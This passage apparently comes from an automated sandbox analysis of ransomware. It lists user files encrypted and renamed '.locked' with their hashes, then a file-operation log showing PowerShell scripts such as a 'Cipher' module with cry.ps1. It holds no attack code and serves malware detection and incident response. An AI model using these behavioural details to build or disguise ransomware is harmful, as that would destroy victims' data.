SHA1: 3aaea82ca7f15ac27a67ba4650b9ce6bd74b4311 SHA256: 6f2bf9f93daa952d0fc9a78e40a31110db8cf247efb55f6f2a85366c51f64c87 SSDeep: 768:4UQ/SOoPcd0vkCKrCKTlIr/IquC0vIm361a+CpxtzOxp:dQ/S3a0vs+KTlIrgvIIxzOn |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\E99EFIcr7L.jpg.locked | 64.39 KB |
MD5:
1bb9c4220c021b5e185ac2cbf0169295
SHA1: ef0a8884143cc8b8a216d77b2c8f699603efb677 SHA256: 3fa2ec8806e49940d7798109860496c9402c003dbafaef9486c5e0113c6d559d SSDeep: 1536:b7SXgBR68586sDUDIAuSHn5u07EiAhuWwDYs+G/K12dHtyFACjcY27Wmk:6wBR65NDQnDHnU0oi+kc12dHtyFA2cYP |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\VysxUTnE 1_O.wav.locked | 84.89 KB |
MD5:
ddf29030dd79e8b11d917a86ea730b39
SHA1: 9979430375f918bfb94888270b47f3ed997a6901 SHA256: 99023bd07f90255561c404c55f09615e79839702968ab53f710d9ae18fc95957 SSDeep: 1536:/6Svz9WZubXz6rBcVshNvqu5u7kSN9KeZVIoDr3du+hZ2+L0ktodQTl:/Zvhrv6Ssqu5KtLK8VPNu+hZ26Uel |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4.locked | 13.93 KB |
MD5:
b445e7e53793cf2a43426f370356c41f
SHA1: 40602d7006042fbecef2a41b675665e2e295f171 SHA256: e2cc37176c9bf264b4ac73df9a9db164cb98fca079248671637b82cb9b29f88b SSDeep: 384:avJ7alrDo7+dDXgI416rsLS5UbWAQxJr8:dr1DXgI4D/Wr8 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg.locked | 58.18 KB |
MD5:
a56330609613dd33fd5b32cf60730116
SHA1: d9b710cad50845179606b740c9bd907f639f8426 SHA256: 8082daaa704b3ff2007c73754287f27b351fe806784701fb83087a7dd58551fd SSDeep: 1536:xeCS9MykGzdwp4m6Qqois6tvj+zJM44CdceldL:xVS9MykGK4mDqoJ6FcJQWldL |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\850T3GF5bL3iQnYCws.bmp.locked | 2.33 KB |
MD5:
fcd8b8589c4aa51305cd73a0dad79cbd
SHA1: a953900124361858fffaf9579dac19e1ee89fbc9 SHA256: 33814235f9e9a66e74b5435c4f12a2cf9bca2cd0b278bde048baad212d4f007c SSDeep: 48:gigk6/0BQi5bXsw/6gjXpywMoqJS5gwZFGVff1LYH+oa3YFdLTpkv:gig9/0BQi57HtywMtJ4JIfyHwYFK |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\andYoimUhyfy9eLS.pdf.locked | 81.82 KB |
MD5:
ec5cce07049ce5d97232648e9a05bd21
SHA1: ab93f404293df896d9f84d602cad9aa9090fd2e5 SHA256: 41fe4415fcef06f9b7bce2fe4d1f4261519d4f66cb63d34763fb8bb8feb3843f SSDeep: 1536:hDWnByvvAy6dNz/a6sGY7yE/kkPF5VCjLAQE49Qrc33itMUBWv7:hDaB5hdNzy6sb9MEvMG49QoniVBWT |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi.locked | 29.02 KB |
MD5:
549c7b4c87103b6ec8218e1621b68446
SHA1: 724517821c00b35dd16cff9014aa4c9731eb8bf1 SHA256: a7784e8b55c9c18c310c9bb5ae9d9767504d070fc8997617bb793db0d11eb2df SSDeep: 768:IsM1oIBp2np9Fpy+bk9rcRdmrp3XgsXTI4m97R6Nd:wTcpy+bk9rcRipHHE4m97id |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\XfssG\fSiPZfDNF8xgDRdCY 9g.xls.locked | 65.93 KB |
MD5:
6a5ab39b1221dd5f223bb544c65b92fe
SHA1: c655f26e49c75ba522fa1cdedcb5a94c3afbdb80 SHA256: 7fdb500c3abd0eaec111d53b0afa8474c2ed0b30d635d3e875846a6c963a1cd4 SSDeep: 1536:XwHEAa+Xv0IU8Wb2JZu6AgHB1UOEtYHSxoPoTkiUP:XwkAa+f0IU8Wb27A6BKOEcgTkZP |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png.locked | 44.96 KB |
MD5:
13d43dec05cbba877c1ebdd933474b7c
SHA1: 7cfaaf6df64a4c82069bb2c7979c6dcb62d2c045 SHA256: e3bfd9fe08948f12eb47350681f7a1bf18d55f155098cb0087c81b18b934eb3e SSDeep: 768:wHBD2GvB+V3vqdbcNssX92HCJLNTC4ODTYEe7392YAycmHFlDrvGuBPrL29Bhqs+:wQY4ic12HCxNTmATj92lOXr7BLkBR5g |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png.locked | 42.75 KB |
MD5:
372d601f79095e23c23e3d860f1dcb6c
SHA1: 51d244baa2ceb05c69859af83a689c1a95a11feb SHA256: c34e78b409d87db2b4955e6b6b1b46714922d6951509ba5e922d990538c16dd0 SSDeep: 768:Ayw8525xujk11Ji0U+FlhkgmJokjeFrU1c7M/Ybnjrdg/Vg5noTSC4g8rPw:Av8+Ak11JiKFlhkxogeFU6I/YTdiu5nm |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg.locked | 11.05 KB |
MD5:
7f48e06d86f0c9e3cca6901549ebedb2
SHA1: c7cf26b8b40a8b552c50bd83a575b7cde941aefc SHA256: 313bf48ca0d3d487955b384d97731fd74f39b1b64389a72a78da4b4db8db4439 SSDeep: 192:8XEImgtaZq9qmo7zhqETHngbFJSSPr/5vWxdu9HQK+sssPj6BO/tpbUlVbOycjio:8XtZcmoV4lIu9cc6BNO9P |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\oEILPk96.mp3.locked | 11.30 KB |
MD5:
60ea47faf981fb4d3435fc065746f8d6
SHA1: e613829ee804d6ea202fab9b0e27f43f07fa134c SHA256: 16e29fc6bde2da17359a6c83eb0e4d4359fa220175df0245fdd289d5380782e5 SSDeep: 192:C7TMgVUerpKsz0aeZYmHzE4SvyDPMpKTPgyZsX/eN4U8HVSMlIgyD7lNEsyY:C7TMgnrpZ+umHgqN7gCsXI4U81SkIxl7 |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav.locked | 42.35 KB |
MD5:
ed19c1b92e999c1c7ee8d3612c219d95
SHA1: cf8976fa1a654863a3fce058d86dfea2b5511580 SHA256: aedd2693710c3b745104f041643bf88cf372938b298197f79d426f1d1fcd2ce9 SSDeep: 768:lU7J7/jC9POP74LwQ+PhIGu4maScct2QKztCBhvBikU0IeWnHnPRZ:a9UPOPAwQ+PWGufXcctVrJiTDHnPRZ |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg.locked | 98.46 KB |
MD5:
5078244d6ed127218591a0f3b94f5e37
SHA1: 70e24a1780259d35a6dd5c4876753e9acf4bb287 SHA256: 47828356c81a91202bd1c940645ea582d0b9bf02db079a58210b52829ff602e6 SSDeep: 3072:KInIndiJm/rQ3arVUjAroJYbuDohVlS2btKkURxzmQN2hOF:KGJm/r5yjAroWSDg7n8RlN2q |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi.locked | 63.25 KB |
MD5:
06424eabca53d684d0f5a5a0b20fae9a
SHA1: 1a2ddcd9fd74473f663257edbc8acfde5474a531 SHA256: 9a19ca33babadcc965327d51ee4ab4809751efb213786b637638943ef1c7e157 SSDeep: 1536:/b2Vh1X3x72T/JLNQWRpKXfP0fd9v7Dw4d+9V/rNz:MnxyTBBxRW0L7s48Bz |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\CN1wFaPbXT9OrbkJc6lP.xls.locked | 1.91 KB |
MD5:
0a8c4021a01bead2bdaefe8eb97e0dd0
SHA1: 4ca3cf1129689a6d7f0621b46baa355f31398883 SHA256: bf0a9686e9586aa7ae2a721a3c586f91e1b6107bc476ab67f8d1ff679cb47f4e SSDeep: 48:oKXNxk9gVT9wE2MMWXqgrX4+pN/Ma5EhqCfX:oKrRP2Zbgro+pFM2cqCf |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4.locked | 86.10 KB |
MD5:
7042d8ab5c9584d81c94742239339e6a
SHA1: ff8908bc9253dcc313619ff2ac0f46cbd3d46c6b SHA256: 5a857f8a14986ff241098dd73d60d1ee6cf64cc5c77791d22bacec510ff4e725 SSDeep: 1536:VHWJRtCcXm/AGWrW82q65aahPqKQLFRV2EaT3wBWhUCmlnZzkW4uln:VCtCX8JdQ/PMLHV2zTgwhdmBjN |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\ws0VxQ YI2xL3-J-kc.pdf.locked | 93.08 KB |
MD5:
39b6855c27a28d9a8d1f04b00accd51f
SHA1: f91528d6884232e4d04a33652460802f319161fe SHA256: 599c3bddd255d189a1d9293395e339c2703a144571a49ded8f2967e2a0a59619 SSDeep: 1536:14r/vDuLSBDdRaZMzwB7KyLaiOhcaDLwghbXbcJ7musX3HIVbf:1w/v6IXaswB7KRiocALwg2hmusXIf |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99ac5758-a46a-40cc-bbcd-b892f0dbaad6 | 0.49 KB |
MD5:
9b0b869c5274d2083f77da232f6ce8f3
SHA1: 7c294200879f64785cc717ff1da951b75d887779 SHA256: 5a2d69d76fa18acb57162c0b8ea2950653356251aafd361d28341547ab7a17d8 SSDeep: 6:NTfXwi1zA+DF59fc4subhXwGVBBJpNVLt7i2Ddqmgx9fXwSgg8NVLt7i2Ddqmgxt:N7LC+DFbv1DJ7izx9/X/Oizxt |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png.locked | 88.93 KB |
MD5:
5e42dad6847135c888c93ec44e7a8cf6
SHA1: dc6a2a7ae9b71b8cc6af3f47285d90056f391b37 SHA256: ec101442ac74a5b91f13f370eb8b76bb309b4c1b8dbb2f49a5dc55ed3b1c0698 SSDeep: 1536:Q+oKKVW3HfATVNRNWM1HJXrsiE5SYI/GHV37fUhHP1yxkwn3TDbHAEGeLa+:QcsMe/NWMrrsNSXM3LUHPYnTgE3LB |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif.locked | 34.75 KB |
MD5:
b966880937f1f9b76724052a3d02a86b
SHA1: 75ec5866c0f3f43744fd6bfad135182ef32b5e94 SHA256: e9cd350aaba3f16988315b7793804262b27290900a29c1b52fed4c68d68a66b7 SSDeep: 768:uBukkbpwwC31XmjMOn12tfCnepBZfGRDibn8iLNvi9h:Zbuz1Xupe/ZfUynXw |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\eC-gacxUBFmRRUn.wav.locked | 35.69 KB |
MD5:
ccf60c1aadae04fd66478a63f80391c4
SHA1: f4a2d6be6f8e6a570009595574c937bc7d00cc97 SHA256: 733c4f794263f0d8ac94dfbbf61beee59a16383263d8e0be41ab5bd06b98f2b1 SSDeep: 768:tGt4joZmLtibYnYLeF1SyBaAZ4/ZFwQBCKgFQze5QWYzfAfdhk:0y0ZeQYAeFVa6+FRBrzhWMfAfdK |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\WQgQtLapPlAiT.wav.locked | 48.91 KB |
MD5:
8cab9737f7afa2776c4914cade89a969
SHA1: 8bd4b2f5de802c00f4cf0884259050ccc0db7952 SHA256: 7e1b39ed97d5339059e4c892add494308daf6b4d53e5d502cf88e149d14aef45 SSDeep: 768:k3jkkUjMM1PaJf1TXDEN2LCzwX7/LNARzd8JVmccEV1DTdbEt:k3jlUjMM1PaJf1UNH0LNizdIOTt |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi.locked | 63.08 KB |
MD5:
f263eb1895ed4dc2fefe5d7e50fdcc8e
SHA1: 93aabe3a16cc8da8dac3f8ce401fcb727e69a6d9 SHA256: 043ee0784023c26ec5786e2984286193773001b075b9c18cb12d4929ef11f754 SSDeep: 1536:yzxubL6W74Z5pP+ai1lA9LOlilxUNCwox/p/cg+hT:yzx9WsB2aiI4lAakn/ag+B |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\3_ fEzbQOQ0OWFLq.xls.locked | 35.04 KB |
MD5:
168cb55bee413e8591397f678eb3085b
SHA1: 9bf5c8d6b1ec554179a34bb5a68c376c74da334f SHA256: d3d89e9df8488f80b9f4b1f972a95fab414b2ced49d5b4c2e71a943ddb27227e SSDeep: 768:tdQ+hZz1AWS6bPIrYZc897Ov28I27dfkfyOhDFg+5:T3hVS6bPm8JOe8I27O73 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg.locked | 48.75 KB |
MD5:
57570ae55a82b1fbe324cb2a59515597
SHA1: b970f4d887ac270c7e19ba6c8bbd5ae3032f5be3 SHA256: 8500b406b9c15fa9f2332ddc2ec475e1a651942885fd406e654c806be42636b4 SSDeep: 1536:Nqye1E4ONVgHZRYrztsoxLrryoTOr9bMGeWa:NqPG44SZRYrztswcrWGeWa |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3.locked | 21.55 KB |
MD5:
fd6217d0847e2197eab8babb43850185
SHA1: c94be120fda8cf6f574987ce31911b8f96dcba18 SHA256: 017997596e50cb9800118a12612480f900d6f2e73f80518324491bd4b3a6f8c0 SSDeep: 384:cvkQDfra/2aJuWHIP84mOb0Nnwt4DSC/8/59WCJF30N3ttbD5Syme3XbY1zZ6wB1:cBrW/2a04X5vOCM5EMENfP0uYZ6wBXBX |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif.locked | 93.16 KB |
MD5:
87511af5794a4d7665f63653e910cdd5
SHA1: 30ef9329b09c49d6b9c808385638c0f6d1842b8b SHA256: 667a1b5a7524a6838882153a12571817e9b9a82bb568f586258464062d5038a8 SSDeep: 1536:1XBJw/wXabshDLPWVmzFdl+f6sWE9yV8DKge9tM7YG2swVQNmi08E7i0un:rK/wJDKVU+SsZGGKBM7j2szM9i0un |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\3y45.bmp.locked | 47.77 KB |
MD5:
866a69a91487d6aea9ffa2b4c37f9e20
SHA1: ead27f719395d1d5a64be420953a1942ace1ab34 SHA256: dfaabd1f2045c261d65240bca1230b7a554e49af5b0a13c7467e32999912dff4 SSDeep: 768:DXY8AtuCZnvbtoiry7AliRohrsnykT7ZlVzvUn1ZNaNGfv82YMk0c0/f:oFy7lMrsykvZmANGc2YycYf |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\wa2Qnh1-ieI.wav.locked | 8.00 KB |
MD5:
b151da8f2fcc63ca226f37bd57d19cf7
SHA1: 52537eb095f4c7d7d1f39e7eac6fa4b3ec31e313 SHA256: 66b2c9a318460f0040111560996f921692d6361e3583084429d165fe3f618dcb SSDeep: 192:YM/s/bVuhCCBw2dfrZzDwEr8hyOKFtuwOu6Z6qlquWlF8P:5meBwmfrZzD4h1KFXqlq1liP |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3.locked | 20.61 KB |
MD5:
f95a1bd3c6dbc35914710d0bf1934c21
SHA1: ba843b838087ecac08d0095d8127ec9603ee5faf SHA256: 2574ecaf825036418fde0014109421552b66e66bf51c1feb1c4eb8746339e35f SSDeep: 384:2Ef5hrFUPpmwyGHOTEIu7G0W/CjG61UBq+sTLLVfL2EaCcFq8vpsgeZp28nn2ZQ9:2Ef5hrFUP4NEIirCBALF2nCKtsiQsusG |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\8BQ91jCUNzN-TOt.bmp.locked | 35.71 KB |
MD5:
3f36e1ace09ea56442e35f6636241dd2
SHA1: 226460ddc0c8565e2910edfabcdf6c71264dd72c SHA256: 6033fb6fadc58384d6410b7d43d862b5fdc433cc71d80807fefe5d4eedba341f SSDeep: 768:/AHL+v5V8qj7JbSPwWXA4rx7BIHaygj8JWOZ1bi47Z8+Z6+j:YOYqjNANrx7BPEWOTbi47Z8+Z7j |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3.locked | 37.47 KB |
MD5:
4dbca01637bd960846b32fbfb324919f
SHA1: dde029eb9d25aff310fd044ace25d36c9836eab2 SHA256: 8080a847d98fa3be1e1ea4fc96a94f851779a7320c0fef804b2fe20069d3c27a SSDeep: 768:pfm2EGBmRml8czCFANpKMzRJrNC6IPHG3SFkX5DuxsUT2zJuprzA6J:5ORmlJwBMvrNC6IPGCFaev2zJupfAm |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\baWSP-fkTz36aO5HJF\gA3Q.mp3.locked | 32.47 KB |
MD5:
693f9fd96cc8a319b14570c43384c3c0
SHA1: fee7ccc392e83ff3b52c8b1704cc10e743874b7a SHA256: 40f189c6265bd635a6a5109de11b78a569f5e2e3baea2446e03c1ffc74f7c203 SSDeep: 768:te2yA4MuM455oGSkZHxYG7UxMp18CziMkjVvJnwDhgiD2:U2y/8WZRnwMn8CPsFwDqt |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif.locked | 68.64 KB |
MD5:
04d59b57fea6bb4fc5c1f7d16f751db0
SHA1: 685e145e3ffac1c1b81703769e99d03e996a849b SHA256: 8e5ceb1c87c9f3fd2f9e986acdd6204a583152bcbb3a08035b03795f6e38b25c SSDeep: 1536:de2mOi5bCl2yxDXTQzrw3kij61YMBw1ruSCnfkLNbeZOlLSG3y5:dephEEeEZ+VuSCnf+bewUG3i |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\HJKQ1w8r3DI.wav.locked | 75.38 KB |
MD5:
26500f1fe156bd0491c3c471a9ddbc49
SHA1: adf6e5122671f4116235935e694ebb5bd7a46701 SHA256: 1601c482d4798ce6268fc0030fa21bdcfc17fe22f357899192da5afa99046b1a SSDeep: 1536:lxgiHgIu/kNeVhXVXYRR5gcxv5ePLr46rB69wrITFg3J:lxYIuaeV3X27gigsUBUwroFg3J |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png.locked | 25.72 KB |
MD5:
ea7df2427cacad2c07d07b72fd56118f
SHA1: 452ec4da30c780349ab65bfd751c4a6618113d33 SHA256: 1d9f1830b5db3559fa6d658598ba236a0ecca5240340e9cc56430781226f8302 SSDeep: 768:mORQ2NQdGKyQKwbx1zbR387ot0OGbBJfHrUyB1:mOR7tDz2xdR387JOAbNr |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg.locked | 30.54 KB |
MD5:
de098ddfde7c268d30e12273ea821c18
SHA1: 485828a40c75752348a5f77e285e799214ab98cb SHA256: 81953ac83b65befc9d8d99d03b716feb783945fbb87919f52bfe60515c9a25f7 SSDeep: 768:0JFI1Ws8DVFcs+ocilfKt/t9feOewjF/sl1UObHjO5qpdM3ztI9h:EIYsEFcZyQ/t93xsl1rDsqpdAzGh |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg.locked | 97.08 KB |
MD5:
c02589f73c33f1041efb8cb33c95ce7f
SHA1: 653318a2741ab34bf4eaeecafb04a9e4520ab7cc SHA256: 0fcf3505b0de7e60fbdf83d611be0860a83a07e30bc5922210a36c7e29b8eaf4 SSDeep: 3072:kOSuz+86sYHbtcmDgWc293QKjuIu3DurKj:kOrz+tpXc2ZVuIuTuGj |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 1.88 KB |
MD5:
d9a00997a9e020307ce91c28b712fbd7
SHA1: f7b9471a80318a241dde7079a30bc1b30384fcb5 SHA256: 8c6b4867fb5a57b8592c697b7cf1963bdd67192d9ebf075a80bd1b7fa010fd9d SSDeep: 48:yHSdSM7gCqNOX7gTHFl2dWBzyzDZBzyzOdIDEBXpBMc:yil7gCjX7gTll2dWBzyzDZBzyzOdIDE5 |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 2.11 KB |
MD5:
93cb4ba9cb3638509e4f45f3fbfaec3f
SHA1: 70a61c06ecff4545cf0bde223c5e612156bbfb51 SHA256: 0bd7638643ba87c245a6ef961ac0fe03c803638b64c741083a15efc0fe6dc5b3 SSDeep: 48:yHSdSM7gCqNOX7gTHFl2dWBzyzDZBzyzOdIDEBXpBMSNEuRA+:yil7gCjX7gTll2dWBzyzDZBzyzOdIDEp |
|
|
Host Behavior
File (4687)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\lgwbzpbm.v3x.ps1 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\gtg41s1t.4zc.psm1 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99ac5758-a46a-40cc-bbcd-b892f0dbaad6 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1d59afd-fedf-4dad-a2f3-bba3e7eabe5c | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_06f90924-1e5d-474b-ba1f-65c4b5caf36a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf1cb9b0-ce8c-44e7-bb1c-52ad1299acf8 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
